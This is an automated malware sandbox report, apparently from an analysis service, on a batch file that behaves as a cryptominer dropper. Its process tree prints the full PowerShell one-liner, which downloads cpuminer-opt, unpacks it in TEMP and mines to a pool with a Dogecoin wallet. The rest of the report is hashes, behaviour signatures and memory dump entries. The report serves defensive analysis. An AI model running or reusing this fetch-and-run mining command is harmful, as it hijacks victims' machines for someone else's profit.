f1afc81fa5c304ba261d76f1941e54ebe25a3a7651b0a45e646183382ec03bc4

Analysis

max time kernel
1792s
max time network
1797s
platform
windows10-1703_x64
resource
win10-20231220-ja
resource tags

arch:x64arch:x86image:win10-20231220-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
03/02/2024, 08:44

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

508B
MD5

d9af861fbfd5f212c2db65e7ed0cd376
SHA1

f9316adde0463e645cc0624f645faad3b972320a
SHA256

f1afc81fa5c304ba261d76f1941e54ebe25a3a7651b0a45e646183382ec03bc4
SHA512

92eb6c1e2a0e1cf196c97c9e9a9f3c53967f9ae58a2b675ce18e967b0e414e6b17ade6e914e96817df1878bbe11022b4737bae0d4078a257de9a132eb1a91536

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	2616	powershell.exe
4	2616	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3968	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe
3968	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2616	powershell.exe
2616	powershell.exe
2616	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2616	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2188 wrote to memory of 2616	2188	cmd.exe	76
PID 2188 wrote to memory of 2616	2188	cmd.exe	76
PID 2616 wrote to memory of 400	2616	powershell.exe	77
PID 2616 wrote to memory of 400	2616	powershell.exe	77
PID 400 wrote to memory of 3968	400	cmd.exe	79
PID 400 wrote to memory of 3968	400	cmd.exe	79

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2188
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2616
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:400
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge,zap=PRIV -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3968

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l3hn0n31.ea3.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
318KB

MD5
8188ade6a8d7dee35e28b37d1c56fc4c

SHA1
cffa1500f93b650b58333b92963ba50fe20eea3c

SHA256
f727508d5cec3a8880f6aae251de560454d7b10a81be42b52f933c6589591da9

SHA512
9395838b902381548fe3fec6924baafaca1147517b386854dcb84a70c5ea4b9bc526741dcf4011aa5442c55c6783667c7abdbd5b6bfc1f65724db60c718aee7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
249KB

MD5
ee95e1ba8ce4f42249d1bde72f92491a

SHA1
918b6c361e882cdce90aea7c44bc4ed99dd5c0d5

SHA256
e8f0e2956ab76604dd9346fb71c38c50b9d683e206b99b6357126d4129042d65

SHA512
f0e03d9753e6c45aed2dab8a27979c209ed62cd4d014f34b4d7591a8bb7db53af98519c0340b1c6fbddb2b6c02eadd1b365ec73a11bf1897add5a9ce4b6518ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
203KB

MD5
b47b10c4278a957fd529252f82e42a2f

SHA1
6b8f5a3f0d0e9a8d80e1232a6a32958bd9e5cdd1

SHA256
e81f20adf0d14e7cbb2400535395f87429f02a34e94ec304a198b431813621ff

SHA512
40e129187765f8f02bb43cb675d96b47150e0f95a847f4eb2e264fd2bb711cd7f0760599cb11b6b60639251a51c64f694eac1ee6c9eba0baa1a218a4b25eaecb

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
248KB

MD5
cb9115c95a3b7769596cf7d16364506f

SHA1
5dcd175758f7c74a6abd024b7174973aae6b589a

SHA256
10c240358236ca500a7f67d16710ffa86788ec33aa3e54a3f724a2117c90082f

SHA512
8cf77a8d39a4651b0d8703b9cf52896f79cce9980591fe7474f52ec177fb172477be283d4a67345169e370c46f202aa0f9726f24277ec14c2a77121beb15a59e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
296KB

MD5
11e994cb2abd9bb1a55440693c88537b

SHA1
b46d5e397817c82d301ba977482182e85cb98e62

SHA256
78fe58b688527fd0b39f6a20b857ce8e631ca6ff64228ca60b03c6280ef7a296

SHA512
d37336abf14078b25c3bf606c3b0fabeca839da4f5e1ac97066cc412fa8c9f8e88296202ba49f41a8f8b4004c2452c8bca04c3e3c87d9c2659c2fe84514066b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
601KB

MD5
76607442df68a98f7ed9088a3f95eff6

SHA1
0c3bd1d5c734a9eb2b3e44928eb71232c9b34744

SHA256
01c625f80a075611854b6121e98f90eaef8004085683cb38c6389dd7070cc46a

SHA512
e045d66996819f0bec13dd27d5bac6e6ab54c54fea8b87c7013dce444da564cb288109e56230529007be0d0d6c2dc777e354a7392690dd2d473b4de499fb800f

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
278KB

MD5
8223fecfed91048f4022fe8d85d3ce98

SHA1
36da5bd816a84d2d5dfb36dffb235d384c8c826a

SHA256
853735fa26d423810bc3de5ce299da9c3ddb4a9f2c5e6a5547692d9f4f235c84

SHA512
2e1dface1dd7973cbccb10eed1d88caeeca971bc142d9951521199e2d8e0f371e33c5dfb2918121489934bb8daacc758875fbb8e9d4fa9e5dd93b6f726819c45

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
216KB

MD5
daa920ef73452da59e7333c4f048a228

SHA1
9d0eb8f26749bc1a9df078e8ca201e2011075d6d

SHA256
99edc9014ad80db617699189f56a3e769418b730764f568e74ba93f0e3242fc7

SHA512
9d976931618df4f8b70e7ac71885bf47d329a34f957b7f4cbd28870b5a46fafcdfe6bcf9b96b70788cecb90b76e4ce3b2e08818a2bf4c2b827a6d1cb185f61d5

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
221KB

MD5
6d19a6d738c44031916cb4f5bc760c46

SHA1
a3479c5dc846795701bd961aa0c71622aee0aa76

SHA256
a9cfec5cddf96db6f708f2f48bd30ad216a059743dfcc4c9790fb0e6daccba65

SHA512
bc3b90ed3487b675fe8e48594e256348a855eebe6d13e11305cf5a6c23de46d0dcd2f3e1c6a274df139b5f94bc9aefee9968411f1a343858e99267092576eaf7

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
360KB

MD5
d0d965a899c627775c30ac2bd9142808

SHA1
b6b711ee947327767d824738c535511616a585fd

SHA256
95583465e8e330cdb1140d48666555bf3d8d130acb24d1577d6a69608e021e05

SHA512
28cdb2b1064ec96e6b3ebe67fbf72dc6d0fa0a585b25d7ff8e5b2482ebdc962192b2f1d94481ae0351184ed1254e2dbee92ad24c486a68baef1e09c28afd487f

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
292KB

MD5
79bf987706440bb059369823ef9c888c

SHA1
7160bdeda99a19358e3177488083b337971a6838

SHA256
f7ee58253c331e985748dce313ddeba6d8abdc7648ae2013befaa466c70f4902

SHA512
2522d5fbfce0006ba6586a1be80b35e204a723ce73a566643fe0d8e11380a9fe1ffa2b739400d94125680ac693f24cbc5429460bedb60d8c8fac836dc145a2b1

Download Submit
memory/2616-33-0x00000237EB790000-0x00000237EB85C000-memory.dmp

Filesize
816KB

Download
memory/2616-7-0x00000237EAF80000-0x00000237EAF90000-memory.dmp

Filesize
64KB

Download
memory/2616-89-0x00007FF836D30000-0x00007FF83771C000-memory.dmp

Filesize
9.9MB

Download
memory/2616-90-0x00000237EB050000-0x00000237EB060000-memory.dmp

Filesize
64KB

Download
memory/2616-115-0x00000237EB790000-0x00000237EB85C000-memory.dmp

Filesize
816KB

Download
memory/2616-54-0x00000237EB400000-0x00000237EB412000-memory.dmp

Filesize
72KB

Download
memory/2616-4-0x00000237EB060000-0x00000237EB0F2000-memory.dmp

Filesize
584KB

Download
memory/2616-31-0x00000237EB3E0000-0x00000237EB3F6000-memory.dmp

Filesize
88KB

Download
memory/2616-28-0x00000237EB050000-0x00000237EB060000-memory.dmp

Filesize
64KB

Download
memory/2616-13-0x00000237EB320000-0x00000237EB396000-memory.dmp

Filesize
472KB

Download
memory/2616-10-0x00000237EB210000-0x00000237EB31E000-memory.dmp

Filesize
1.1MB

Download
memory/2616-9-0x00000237EB050000-0x00000237EB060000-memory.dmp

Filesize
64KB

Download
memory/2616-5-0x00000237EAF90000-0x00000237EAFB2000-memory.dmp

Filesize
136KB

Download
memory/2616-8-0x00000237EB050000-0x00000237EB060000-memory.dmp

Filesize
64KB

Download
memory/2616-116-0x00007FF836D30000-0x00007FF83771C000-memory.dmp

Filesize
9.9MB

Download
memory/2616-67-0x00000237EB030000-0x00000237EB03A000-memory.dmp

Filesize
40KB

Download
memory/2616-6-0x00007FF836D30000-0x00007FF83771C000-memory.dmp

Filesize
9.9MB

Download
memory/3968-147-0x0000000059A30000-0x0000000059AC8000-memory.dmp

Filesize
608KB

Download
memory/3968-162-0x0000000059A30000-0x0000000059AC8000-memory.dmp

Filesize
608KB

Download
memory/3968-131-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3968-130-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3968-129-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-139-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-133-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/3968-154-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-132-0x0000000059A30000-0x0000000059AC8000-memory.dmp

Filesize
608KB

Download
memory/3968-159-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-144-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-169-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-174-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3968-177-0x0000000059A30000-0x0000000059AC8000-memory.dmp

Filesize
608KB

Download
memory/3968-184-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download